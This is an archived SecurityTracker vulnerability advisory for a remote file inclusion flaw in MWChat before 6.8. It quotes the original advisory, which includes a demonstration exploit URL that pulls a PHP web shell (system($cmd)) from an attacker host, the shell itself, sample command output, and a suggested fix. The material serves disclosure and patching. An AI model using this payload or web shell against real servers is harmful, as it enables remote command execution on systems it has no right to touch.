SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   MWChat Vendors:   AppIndex
MWChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014090
SecurityTracker URL:  http://securitytracker.com/id/1014090
CVE Reference:   CVE-2005-1869   (Links to External Site)
Updated:  Jun 9 2005
Original Entry Date:  Jun 2 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 6.8
Description:   Status-x reported a vulnerability in MWChat. A remote user can execute arbitrary commands on the target system.

The 'start_lobby.php' script includes the 'chat_maintainance.php' script relative to the user-supplied '$CONFIG[MWCHAT_Libs]' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname%20-a

The original advisory is available at:

http://www.defacers.com.mx/advisories/4.txt

[Editor's note: The vendor's distribution includes default '.htaccess' files for several directories, including the 'libs' directory. Only systems where the '.htaccess' file has been removed or modified are affected.]

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (6.8), available at:

http://www.appindex.net/products/detail/?product=mwchat

Vendor URL:  www.appindex.net/products/detail/?product=mwchat (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  MW Chat Remote File Include


#####################################################################
MW CHAT Version 6.xx Remote File Include
Affected Script: start_lobby.php
Vendor: http://www.appindex.net
Vendor Response: None i Suppose because the site is not updated since
                 2003
Vendor Confirmed: No but i confirmed  ;) 

Http://www.defacers.com.mx/advisories/4.txt - Advisory #4

Author: Status-x             E-mail: phr4xz@gmail.com

####################################################################

====================================================================


Description:

MW CHAT its a free chat system wich allows users to comunicate with

emoticons, colors and with a good visual design.


====================================================================


Vulnerability Description:


The bug is inside the "libs" DIR and also is located in other files

but in the other files the vulnerability cannot be confirmed

Lets take a look into the start_lobby.php source:


*********************************************************************
$Sequence = $STATUS[CLIENT_IP]; $Sequence_Check
= base64_encode($Sequence); 
include("$CONFIG[MWCHAT_Libs]/chat_maintainance.php"); 
$rgLobby_SELECT = db_query(Validate(3), $CONN); $szResult
= db_numrows($rgLobby_SELECT); if ($szResult == "0") 
*********************************************************************

And as we can see in all the source code the $CONFIG[MWCHAT_Libs]

variable its not defined so we can make a cmd.txt file with the next

source


***************

<?

system($cmd)

?>

***************


Then we upload that file into a webserver and can execute *NIX CMD

into the affected server or site


http://silly.com
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evil/cmd.txt?&cmd=uname
-a


And we will get a nice answer from the affected server


*******************************************************

Linux ass 2.4.29-rc1 #1 SMP Fri Jan 7 17:47:33 MST 2005

*******************************************************


====================================================================


How to Fix:


The vendor didnt replied but i suppose changing the affected source

with the next one the trouble should be corrected  ;) 


*********************************************************************
$Sequence = $STATUS[CLIENT_IP]; $Sequence_Check
= base64_encode($Sequence); 
include("/libs/chat_maintainance.php"); 
$rgLobby_SELECT = db_query(Validate(3), $CONN); $szResult
= db_numrows($rgLobby_SELECT); if ($szResult == "0") 
*********************************************************************


Or xD hehehe try to contact the vendor  ;) 


====================================================================


Credits and Contact:


This vulnerability was discovered by Status-x | phr4xz@gmail.com


Http://www.defacers.com.mx


01 June 2005

====================================================================
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC